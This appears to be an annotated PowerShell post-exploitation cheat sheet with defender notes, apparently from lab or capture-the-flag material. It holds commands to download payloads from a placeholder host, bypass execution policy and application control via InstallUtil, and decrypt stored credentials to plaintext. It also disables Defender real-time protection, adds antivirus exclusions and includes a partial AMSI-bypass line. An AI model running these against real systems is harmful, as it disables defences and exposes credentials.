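# Paths of the Windows PowerShell 5.1 host on a 64-bit system.
# (The leading "Copy" in the source is the page's copy button, not part of the path.)
# SysWOW64 holds the 32-bit (x86) host, System32 the native 64-bit host.
# Defender note: logging, script block auditing and application-control rules
# should cover both binaries, not only the System32 one.
C:\windows\syswow64\windowspowershell\v1.0\powershell
C:\Windows\System32\WindowsPowerShell\v1.0\powershell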
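# Four ways to fetch a file over HTTP from Windows PowerShell; "IP" is a placeholder host.
# (The leading "Copy" in the source is the page's copy button: as written, "Copy ..." would
# invoke the Copy-Item alias instead of the intended cmdlet.)
# -OutFile is spelled out: the "-O" prefix is unambiguous on Windows PowerShell 5.1 but
# may become ambiguous on newer PowerShell releases that add other "O..." parameters.
Invoke-WebRequest -Uri http://IP/file.exe -OutFile file.exe
# .NET WebClient; DownloadFile takes a destination path rather than a relative filename.
(New-Object Net.WebClient).DownloadFile("http://IP/file.exe","C:\Windows\Temp\file.exe")
# On Windows PowerShell 5.1, wget and curl are aliases of Invoke-WebRequest, not the
# Unix tools; PowerShell 6+ removed these aliases.
wget http://IP/file.exe -OutFile file.exe
curl http://IP/file.exe -OutFile file.exe
# Detection note: plaintext HTTP downloads by powershell.exe show up in proxy logs and,
# with script block logging enabled, in Microsoft-Windows-PowerShell/Operational (event 4104).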
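# Run a script while overriding the execution policy for that one process only;
# no persistent setting is changed.
# (The leading "Copy" in the source is the page's copy button, not part of the command.)
PowerShell.exe -ExecutionPolicy Bypass -File .\file.ps1
# Persistently relax the policy for the current user only; this is a per-user registry
# write and does not need administrator rights.
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted
# Note: execution policy is a safety feature against accidental script execution, not a
# security boundary; a policy change is itself a useful audit signal (event 4104 when
# script block logging is on, plus the per-user registry modification).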
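# Report the language mode of the current PowerShell session.
# (The leading "Copy" in the source is the page's copy button, not part of the expression.)
$ExecutionContext.SessionState.LanguageMode
# Values could be: FullLanguage or ConstrainedLanguage (the PSLanguageMode enum also
# defines RestrictedLanguage and NoLanguage, which are rarely seen interactively).
# Defender note: ConstrainedLanguage is normally enforced by an application-control policy
# (WDAC/AppLocker); a FullLanguage result on a host that should be constrained is worth
# investigating.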
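# InstallUtil.exe (the .NET Framework installer tool) run with logging disabled; /U means
# "uninstall". (The leading "Copy" in the source is the page's copy button.)
# Two extraction artefacts are repaired here: the path appeared as "c: \t emp \p sby.exe",
# which reads as c:\temp\psby.exe, and "/LogToConsole= true" had a stray space that would
# split the switch from its value.
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /U c:\temp\psby.exe
# NOTE(review): "/revs" is not a documented InstallUtil switch and is probably truncated in
# the source; kept verbatim rather than guessed at.
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revs
# Defender note: InstallUtil.exe is a signed Microsoft binary that executes code from the
# assembly passed to it, which is why Microsoft's recommended application-control block
# rules include it; InstallUtil launches with /U and a path outside the usual program
# directories are a good alerting candidate.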
Secure String to Plaintext
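# Rebuild a PSCredential from a SecureString that was previously exported with
# ConvertFrom-SecureString (the long hex blob) and read its password back as plaintext.
# (The leading "Copy" in the source is the page's copy button, not part of the statement.)
# Without -Key, ConvertTo-SecureString uses DPAPI, so the blob only decrypts under the same
# Windows user account on the machine that produced it.
$pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692" | ConvertTo-SecureString
$user = "HTB\Tom"
$cred = New-Object System.Management.Automation.PSCredential($user, $pass)
# GetNetworkCredential() exposes the plaintext password. Fixed: the source had a space
# before "()", which PowerShell rejects as a parse error.
$cred.GetNetworkCredential() | Format-List
# Output shown in the source:
#   UserName       : Tom
#   Password       : 1ts-mag1c!!!
#   SecurePassword : System.Security.SecureString
#   Domain         : HTB
# Defender note: an exported SecureString is only as protected as the user profile that
# created it; treat such blobs in scripts or config files as stored credentials.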
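# Load a PSCredential that was saved with Export-CliXml and read its password back as
# plaintext. (The leading "Copy" in the source is the page's copy button.)
# Export-CliXml protects the password with DPAPI, so cred.xml only decrypts for the
# user account and machine that wrote it.
# Fixed: the source had a space before "()", which PowerShell rejects as a parse error.
$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *
# Output shown in the source:
#   UserName       : Tom
#   Password       : 1ts-mag1c!!!
#   SecurePassword : System.Security.SecureString
#   Domain         : HTB
# Defender note: credential XML files left on disk are recoverable by anyone who can run
# code as that user; they should be found and removed during hardening reviews.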
Antivirus (Requires Higher Privileges)
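#Check status (read-only; reports real-time protection, signature age, etc.)
#(The leading "Copy" in the source is the page's copy button, not part of the comment.)
Get-MpComputerStatus
#Disable real-time protection. Needs local administrator rights, is refused when Tamper
#Protection is on, and Defender records the change in the
#Microsoft-Windows-Windows Defender/Operational log (event 5001).
Set-MpPreference -DisableRealtimeMonitoring $true
#Set exclusion path. Also logged by Defender as a configuration change (event 5007);
#exclusions added at runtime are a strong audit signal.
Add-MpPreference -ExclusionPath "C:\users\public\documents\magichk"
#Disable AMSI — the one-liner below is truncated in the source (unterminated string) and
#is left commented out as found rather than reconstructed. Attempts to reach AmsiUtils
#fields via reflection are a well-known detection signature.
#"[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,St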
Execute Commands as Another User
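#CREATE A CREDENTIAL OBJECT
#(The leading "Copy" in the source is the page's copy button, not part of the comment.)
# The password is supplied as a plaintext literal; ConvertTo-SecureString requires -Force
# together with -AsPlainText. Values in <...> are placeholders.
$pass = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("<USERNAME>", $pass)
# Execute `whoami` command on the named host over PowerShell Remoting as $cred.
# -ComputerName is written out in full (the source used the "-Computer" prefix).
Invoke-Command -ComputerName <Computer-Name> -ScriptBlock { whoami } -Credential $cred
# Note: a plaintext password in a script, transcript or console history is itself a
# finding; the remote host records the resulting logon, and script block logging
# (event 4104) captures the command on the source host.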
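# List scheduled tasks outside the \Microsoft\ folder, i.e. tasks created by third-party
# software or by hand — a common place to review for persistence.
# (The leading "Copy" in the source is the page's copy button, not part of the pipeline.)
# Fixed: "$_ .TaskPath" (space before the member access) does not parse in PowerShell.
Get-ScheduledTask | Where-Object { $_.TaskPath -notlike "\Microsoft*" } | Format-Table TaskName,TaskPath,State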